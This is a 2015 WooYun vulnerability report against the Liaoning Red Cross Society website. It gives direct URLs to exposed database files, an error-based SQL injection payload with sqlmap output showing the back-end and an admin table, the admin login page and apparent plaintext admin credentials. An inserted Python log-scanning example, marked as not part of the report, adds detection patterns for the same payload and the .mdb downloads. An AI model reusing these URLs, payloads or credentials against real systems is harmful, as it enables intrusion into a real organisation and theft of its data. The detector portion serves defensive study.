
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0131784

Title: Liaoning Red Cross Society vulnerability bundle

Vendor: Red Cross Society

Author: 路人甲

Submitted: 2015-08-05 17:02

Fixed: 2015-09-21 15:04

Published: 2015-09-21 15:04

Vulnerability type: arbitrary file traversal/download

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner (CNCERT, National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-05: Details sent to the vendor; awaiting vendor handling
2015-08-07: Vendor confirmed; details visible to the vendor only
2015-08-17: Details disclosed to core white hats and domain experts
2015-08-27: Details disclosed to regular white hats
2015-09-06: Details disclosed to intern white hats
2015-09-21: Details disclosed to the public

Brief description:

See title.

Detailed description:

1. Database download
http://www.lnredcross.org.cn/bbs/boke/Data/Dvboke.mdb
http://www.lnredcross.org.cn/database/%23newasp.mdb
http://www.lnredcross.org.cn/HSH.mdb (1.3 GB)

[image: 1.jpg]


2. SQL injection
http://www.lnredcross.org.cn/web/content.asp?id=2,3,4,5,6&name=%EF%BF%BD%EF%BF%BD%D6%AF%EF%BF%BD%EF%BF%BD%EF%BF%BD&articleid=2435

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 52 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=2,3,4,5,6) AND 8982=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8982=8982) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113))) AND (5589=5589&name=%EF%BF%BD%EF%BF%BD%D6%AF%EF%BF%BD%EF%BF%BD%EF%BF%BD&articleid=2435
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: lnredcross
Table: NC_Admin
[13 entries]


Admin panel: http://www.lnredcross.org.cn/manage_redcross/admin_login.asp
admin/huawei@3com
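As an added, defender-side example that is not part of this report: a small Python checker that flags, in constructed IIS-style log lines, the two issues described above, namely direct downloads of .mdb database files (including the URL-encoded `%23` prefix seen in `%23newasp.mdb`) and query strings carrying the error-based MSSQL payload shape that sqlmap reported. The log field layout, the sample lines and the signature set are assumptions.

```python
import re
from urllib.parse import unquote
# Constructed IIS W3C-style log lines modelled on the two findings in the report
# (date time cs-method cs-uri-stem cs-uri-query sc-status); not real traffic.
SAMPLE_LOG = """\
2015-08-05 09:01:11 GET /web/content.asp id=2&name=x&articleid=2435 200
2015-08-05 09:01:12 GET /database/%23newasp.mdb - 200
2015-08-05 09:01:13 GET /HSH.mdb - 206
2015-08-05 09:01:14 GET /web/content.asp id=2,3,4,5,6)+AND+8982=CONVERT(INT,(SELECT+CHAR(113)%2BCHAR(120)))+AND+(5589=5589&articleid=2435 500
2015-08-05 09:01:15 GET /images/1.jpg - 200
"""

# Database files that a web server should never hand out.
DB_EXTENSIONS = (".mdb", ".accdb", ".bak")

# Signatures of the error-based MSSQL payload shape shown above: a CONVERT(INT, ...)
# cast that forces a conversion error, CHAR() marker concatenation, and the "AND (n=n" tail.
SQLI_PATTERNS = [
    re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    re.compile(r"CHAR\s*\(\s*\d+\s*\)\s*\+\s*CHAR\s*\(", re.I),
    re.compile(r"\bAND\s+\(?\d+\s*=\s*\d+", re.I),
]

def classify(line):
    """Return the alert tags for one log line (empty list if benign)."""
    fields = line.split()
    if len(fields) < 6:
        return []
    _date, _time, _method, stem, query, status = fields[:6]
    alerts = []
    # Decode the stem so a '%23' prefix (the '#'-named database trick, as in
    # %23newasp.mdb) is still recognised as a request for a .mdb file.
    if unquote(stem).lower().endswith(DB_EXTENSIONS):
        # A 2xx status means the file was actually served, not merely probed.
        alerts.append("db-file-served" if status.startswith("2") else "db-file-probe")
    # '+' encodes a space in the query string; percent-decode (e.g. %2B) afterwards.
    query_dec = unquote(query.replace("+", " "))
    hits = sum(1 for p in SQLI_PATTERNS if p.search(query_dec))
    if hits >= 2:  # require two independent signatures to keep false positives low
        alerts.append("error-based-sqli")
    return alerts

def scan(log_text):
    """Map each suspicious line (1-based index) to its alert tags."""
    result = {}
    for i, line in enumerate(log_text.splitlines(), 1):
        tags = classify(line)
        if tags:
            result[i] = tags
    return result
```

A 2xx on a `.mdb` stem is the finding that matters: the file left the server, so the response is credential rotation and removal of the file from the web root, not just blocking the extension.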

Proof of vulnerability: (repeats the detailed description above)


Remediation:

You are the experts.

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-08-07 15:03

Vendor reply:

CNVD confirmed the reported issue; it has been forwarded through CNCERT to the relevant branch center, which will coordinate remediation with the website's operating unit.

Latest status:

None